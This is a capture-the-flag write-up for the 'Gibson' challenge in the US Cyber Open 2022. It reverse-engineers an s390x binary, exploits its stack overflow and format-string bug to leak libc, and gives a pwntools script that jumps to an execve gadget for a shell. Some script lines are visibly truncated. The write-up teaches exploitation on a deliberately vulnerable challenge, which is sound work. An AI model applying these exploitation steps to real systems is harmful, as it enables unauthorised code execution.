US Cyber Open 2022 - Gibson - Stack overflow to RCE on s390x

Posted on Sep 14, 2022

Can you really call it a “main"frame if I haven’t used it before now? Author: Research Innovations, Inc. (RII)

Gibson was a binary exploitation challenge in the US Cyber Open CTF in 2022, which is the first step toward qualification for the US Cyber Team. At the end of the CTF, it was worth 1000 points and had 10 solves. I was the fourth solve on this challenge (could have been second if CTFd wasn’t glitching[1] 😔).

Anyways, let’s get to the challenge!

We are given a tarball that contains a docker setup (for both debug and testing), and the binaries for the challenge (which were a program called mainframe and the file that it dynamically loads).

Initial Investigation - What even is this?

Running file and checksec on the binary, we find that it is compiled for the s390x architecture. I’d never heard of this architecture before, but looking it up, it looks like it was designed by IBM, and was discontinued in 1998. 💀

$ file mainframe
mainframe: ELF 64-bit MSB executable, IBM S/390, version 1 (SYSV), dynamically linked, interpreter /lib/, BuildID[sha1]=5684ff421a651508bbe92190636290180d7e03c2, for GNU/Linux 3.2.0, not stripped
$ checksec mainframe
[!] Could not populate PLT: AttributeError: arch must be one of ['aarch64', 'alpha', 'amd64', 'arm', 'avr', 'cris', 'i386', 'ia64', 'm68k', 'mips', 'mips64', 'msp430', 'none', 'powerpc', 'powerpc64', 'riscv', 's390', 'sparc', 'sparc64', 'thumb', 'vax']
[*] '/home/ethan/ctf/uscyberopen/pwn/gibson/gibson_s390x/bin/mainframe'
    Arch:     em_s390-64-big
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x1000000)

This gives us some information about the binary. Seems that s390x is a big-endian architecture (yikes!), and that the binary is compiled with no PIE and no canary.

Setting up the environment - Thanks for the help!

Thankfully, the challenge author has left a file for us to read, to guide us in setting up a debug/test environment. Not only that, but a docker-compose.yml file has been left for us to do all the necessary configuration for the challenge environment. Other people did run into some problems with the debug environment not working, but this could be solved by updating to the latest version of Docker and docker-compose.

Running docker-compose up --build -d, we start the containers—one for debug and one for testing. As we can see from the file, we can connect to localhost:8888 to access the debug challenge, localhost:1234 to access the qemu gdbserver, and localhost:9999 to access a testing environment for the challenge that should be identical to the one that the organizers have.

Now that we have a debug environment, we can start with the actual challenge!

Reverse engineering - Time to guess what opcodes do!

I looked online for any decompilers for s390x, but it seems that there was nothing. So, I installed s390x-linux-gnu-objdump with apt-get install binutils-s390x-linux-gnu, and started reading through the assembly code. The important part of the disassembly is the main function:

Sidenote: Sadly, s390x-linux-gnu-objdump does not seem to support Intel syntax, so we’ll have to bear with what we have right now.😢

0000000001000830 <main>:
 1000830:       eb bf f0 58 00 24       stmg    %r11,%r15,88(%r15)
 1000836:       e3 f0 fb 58 ff 71       lay     %r15,-1192(%r15)
 100083c:       b9 04 00 bf             lgr     %r11,%r15
 1000840:       c4 18 00 00 0b d8       lgrl    %r1,1001ff0 <stdin@GLIBC_2.2>
 1000846:       e3 10 10 00 00 04       lg      %r1,0(%r1)
 100084c:       a7 59 00 00             lghi    %r5,0
 1000850:       a7 49 00 02             lghi    %r4,2
 1000854:       a7 39 00 00             lghi    %r3,0
 1000858:       b9 04 00 21             lgr     %r2,%r1
 100085c:       c0 e5 ff ff ff 1c       brasl   %r14,1000694 <setvbuf@plt>
 1000862:       c4 18 00 00 0b cb       lgrl    %r1,1001ff8 <stdout@GLIBC_2.2>
 1000868:       e3 10 10 00 00 04       lg      %r1,0(%r1)
 100086e:       a7 59 00 00             lghi    %r5,0
 1000872:       a7 49 00 02             lghi    %r4,2
 1000876:       a7 39 00 00             lghi    %r3,0
 100087a:       b9 04 00 21             lgr     %r2,%r1
 100087e:       c0 e5 ff ff ff 0b       brasl   %r14,1000694 <setvbuf@plt>
 1000884:       ec 1b 00 a0 00 d9       aghik   %r1,%r11,160
 100088a:       a7 49 04 00             lghi    %r4,1024
 100088e:       a7 39 00 00             lghi    %r3,0
 1000892:       b9 04 00 21             lgr     %r2,%r1
 1000896:       c0 e5 ff ff ff 0f       brasl   %r14,10006b4 <memset@plt>
 100089c:       c0 20 00 00 00 d6       larl    %r2,1000a48 <_IO_stdin_used+0x4>
 10008a2:       c0 e5 ff ff fe d9       brasl   %r14,1000654 <puts@plt>
 10008a8:       c0 20 00 00 00 d7       larl    %r2,1000a56 <_IO_stdin_used+0x12>
 10008ae:       c0 e5 ff ff fe d3       brasl   %r14,1000654 <puts@plt>
 10008b4:       ec 1b 00 a0 00 d9       aghik   %r1,%r11,160
 10008ba:       a7 49 07 d0             lghi    %r4,2000
 10008be:       b9 04 00 31             lgr     %r3,%r1
 10008c2:       a7 29 00 00             lghi    %r2,0
 10008c6:       c0 e5 ff ff fe 97       brasl   %r14,10005f4 <read@plt>
 10008cc:       c0 20 00 00 00 cf       larl    %r2,1000a6a <_IO_stdin_used+0x26>
 10008d2:       c0 e5 ff ff fe c1       brasl   %r14,1000654 <puts@plt>
 10008d8:       e5 48 b4 a0 00 00       mvghi   1184(%r11),0
 10008de:       a7 f4 00 13             j       1000904 <main+0xd4>
 10008e2:       e3 10 b4 a0 00 04       lg      %r1,1184(%r11)
 10008e8:       43 11 b0 a0             ic      %r1,160(%r1,%r11)
 10008ec:       c0 17 00 00 00 52       xilf    %r1,82
 10008f2:       18 21                   lr      %r2,%r1
 10008f4:       e3 10 b4 a0 00 04       lg      %r1,1184(%r11)
 10008fa:       42 21 b0 a0             stc     %r2,160(%r1,%r11)
 10008fe:       eb 01 b4 a0 00 7a       agsi    1184(%r11),1
 1000904:       e3 10 b4 a0 00 04       lg      %r1,1184(%r11)
 100090a:       c2 1e 00 00 03 ff       clgfi   %r1,1023
 1000910:       a7 c4 ff e9             jle     10008e2 <main+0xb2>
 1000914:       a7 29 00 00             lghi    %r2,0
 1000918:       c0 e5 ff ff fe 8e       brasl   %r14,1000634 <sleep@plt>
 100091e:       ec 1b 00 a0 00 d9       aghik   %r1,%r11,160
 1000924:       b9 04 00 21             lgr     %r2,%r1
 1000928:       c0 e5 ff ff fe 76       brasl   %r14,1000614 <printf@plt>
 100092e:       a7 18 00 00             lhi     %r1,0
 1000932:       b9 14 00 11             lgfr    %r1,%r1
 1000936:       b9 04 00 21             lgr     %r2,%r1
 100093a:       eb bf b5 00 00 04       lmg     %r11,%r15,1280(%r11)
 1000940:       07 fe                   br      %r14
 1000942:       07 07                   nopr    %r7
 1000944:       07 07                   nopr    %r7
 1000946:       07 07                   nopr    %r7

These opcodes are different than the familiar ones, as this is not x86. I found a reference for the opcodes at, but a lot of the opcodes do not have a wiki article added so I had to do a bit of inferring as to what each opcode did.

While investigating s390x, I also noticed that at the end of each function, we have a br %r14 instruction. This instruction means that program execution continues at the address in r14 after a function is called. We could say that the return address is stored in the r14 register. I also found that r15 is being used as the stack pointer.

After a while, I found two vulnerabilities. First of all, there’s a stack buffer overflow at 0x10008c6:

 10008b4:       ec 1b 00 a0 00 d9       aghik   %r1,%r11,160
 10008ba:       a7 49 07 d0             lghi    %r4,2000
 10008be:       b9 04 00 31             lgr     %r3,%r1
 10008c2:       a7 29 00 00             lghi    %r2,0
 10008c6:       c0 e5 ff ff fe 97       brasl   %r14,10005f4 <read@plt>

Here, 2000 bytes are written into a buffer that is 1024 (or something like that) bytes long. We can guess from here that the calling convention for this architecture is that arguments get passed through r2, r3, and then r4. This is because we see here that read(0, <address>, 2000) is being called.

Another vulnerability that I found was that at 0x1000928, user input is passed through r2, making it the first argument to printf. This is a format string vulnerability.

 100091e:       ec 1b 00 a0 00 d9       aghik   %r1,%r11,160
 1000924:       b9 04 00 21             lgr     %r2,%r1
 1000928:       c0 e5 ff ff fe 76       brasl   %r14,1000614 <printf@plt>

However, after running the program (through connecting to localhost:9999), we can see that the lines of assembly before the call to printf do manipulate our input a little bit.

$ nc localhost 9999
Enter payroll data:
Processing data...

Through looking at the assembly and experimenting a bit, we can see that our input is XORed with the character R before being passed to printf. This shouldn’t be a problem, because we can just XOR our input with R before passing it the program.

So, let’s see what we know at this point:

  • The program reads in too much input, leading to a stack buffer overflow
  • The program also calls printf() on the input XORed with R, allowing us to leak values (or write to arbitrary addresses with the %n format specifier)

Exploitation - What do we control?

We do have a stack overflow, but we do not know if the stack in s390x works the same way as in x86. So, we do some experimentation.

First, we generate a cyclic pattern with cyclic 2000 -n 8. Then we pass it to the program running with GDB at localhost:8888. This can be debugged with the gdbserver running at localhost:1234 using gdb-multiarch:

gef➤  set architecture s390:64-bit
The target architecture is assumed to be s390:64-bit
gef➤  file bin/mainframe
Reading symbols from bin/mainframe...
(No debugging symbols found in bin/mainframe)
Python Exception <class 'ValueError'> 22 is not a valid Abi:
gef➤  target remote localhost:1234

We can then examine the registers in GDB with info reg. Four of the registers look like they have been affected by our input:

r11            0x7061616161616166  0x7061616161616166
r12            0x7161616161616166  0x7161616161616166
r13            0x7261616161616166  0x7261616161616166
r14            0x7361616161616166  0x7361616161616166
r15            0x7461616161616166  0x7461616161616166

Seems that we have control over r11, r12, r13, r14, and r15! This is more register control than we would have in x86_64, where we have control over only rbp and rip. We know that r14 will be jumped to at the end of the function, so we do control the return address. We also know that r15 is the stack pointer. This should not be changed by our overflow. Lastly, we control r11 through r13, which could be useful later when trying to get a shell.

We look up the offsets to our saved registers with cyclic -l 0x6661616161616170 -n 8. (Note how I had to convert from big endian to little endian) This gives us an offset of 1120 bytes to our saved registers!

The mainframe binary in of itself does not have a win function or anything that would be useful to call, so we will have to try to leak the libc base address in order to get a shell. We can do this with a format string. This format string leak can be done in the same way as we would usually do a format string leak, so I will not cover the details here. However, there are two things that we must pay attention to:

  • We must make sure to XOR it with R when we are finished.
  • Because this is big-endian, the first two bytes are null. So, if we want to leak with %s, we must offset our address by 2 to get the non-null bytes.

I used this python snippet with pwntools to generate the format string payload[2]:

xor(b"%6$s\0\0\0\0" + p64(, b"R")

We can parse this with u64() in pwntools, which will automatically use big endian for p64() and u64() if we set the context correctly.

Now that we have a leak, we can use our overflow to return back to the main function and do another overflow, this time with a leak!

Finding shell gadgets - Grep for the win!

Now that we have control of the program control flow and a leak, we can jump to an address that will give us a shell! On x86_64, I would use a one_gadget to spawn a shell. However, there are no tools (that I know of) that will do this on s390x. I’m not even sure if there are any one_gadgets on this version of the s390x libc. However, remembering that we have control over r11, r12, and r13, we can find something that’s close enough.

First of all, we need to look into syscalls in the s390x architecture. Finding a place where the execve syscall is being called is a good first step in finding somewhere that will spawn a shell. I found a table of syscall numbers int the kernel source code, which tells us that execve is syscall 11. Referring back to the table of instructions found earlier, we find that the svc instruction is used to call a syscall. We chain objdump and grep to find where this syscall is used:

$ s390x-linux-gnu-objdump -d  | grep -B 3 -
A 3 'svc\s*11$'
   d9bfe:       07 07                   nopr    %r7

00000000000d9c00 <execve@@GLIBC_2.2>:
   d9c00:       0a 0b                   svc     11
   d9c02:       a7 49 f0 01             lghi    %r4,-4095
   d9c06:       b9 21 00 24             clgr    %r2,%r4
   d9c0a:       c0 b4 00 00 00 04       jgnl    d9c12 <execve@@GLIBC_2.2+0x12>

There’s only one location where execve is called, at the beginning of the execve() function. We use the same strategy to find where execve() is called, and we find this gadget:

$ s390x-linux-gnu-objdump -d  | grep -B 3 -A 3 'd9c00'
   da680:       b3 cd 00 49             lgdr    %r4,%f9
   da684:       b3 cd 00 3e             lgdr    %r3,%f14
   da688:       b9 04 00 2d             lgr     %r2,%r13
   da68c:       c0 e5 ff ff fa ba       brasl   %r14,d9c00 <execve@@GLIBC_2.2>
   da692:       e3 10 b0 a0 00 04       lg      %r1,160(%r11)
   da698:       e3 60 10 00 00 04       lg      %r6,0(%r1)
   da69e:       58 16 a0 00             l       %r1,0(%r6,%r10)

Jumping to libc base + 0xda688 will load the contents of r13 into r2 (where the first argument of the syscall is called), then call execve(), which will call the execve syscall!

Because we control r13, we can put the address of /bin/sh (which is present in libc because of the system function) into the first argument passed to excecve, hope that r3 and r4 are 0, and spawn a shell![3]

That gives us our final exploit path:

  • Leak libc address by using the format string to read from the GOT
  • Return to main because we control r14
  • Return to the shell gadget while setting r13 to a pointer to /bin/sh

Putting it all together

Here’s my solve script:

from pwn import *

elf = ELF("./mainframe")
libc = ELF("./")
context.arch = "s390"
context.bits = 64
conn = remote("localhost", 9999)

payload = xor(b"%6$s\0\0\0\0" + p64(, b"R")
payload = payload.ljust(1120, b"a")
payload += p64(0)  # r11
payload += p64(0)  # r12
payload += p64(0)  # r13
payload += p64(elf.sym.main) # r14
conn.send(payload) # ret2main

libc.address = u64(b"\0\0" + conn.recv(6)) - libc.sym.puts # leak libc
info("libc @ " + hex(libc.address))

payload = b""
payload = payload.ljust(1120, b"a")
payload += p64(0)  # r11
payload += p64(0)  # r12
payload += p64(next('/bin/sh'))) # r13, gets popped into r2
payload += p64(libc.address + 0xda680) # r14, our shell gadget


This gets us a shell, and we can run cat flag to get the flag[4]: USCG{RIIdiculouslyAwesome_5d4b48559f6ee937b9cbfc809bafad62}

[1] The organizers were not able to host the challenge as something that players could connect to, so instead we had to submit solve scripts through a (glitchy) submission box on CTFd. I believe that my submission didn’t go through the first time I solved it.😭

[2] Originally, I used %p to leak the libc address, but this was different on the debug and testing environments, probably because the stack was shifted around as a result of the different environments. A more reliable way was to use the GOT to leak, which is what I did in this writeup.

[3] After some discussion with others, it seems that some people were able to utilize the system function, or find a gadget to arbitrarily set r2. But I like this method because it’s the first thing that I found in libc. 🙂

[4] This was actually DMed to us afterwards, as the organizers ran the solve scripts against their own infrastructure rather than having players to run them.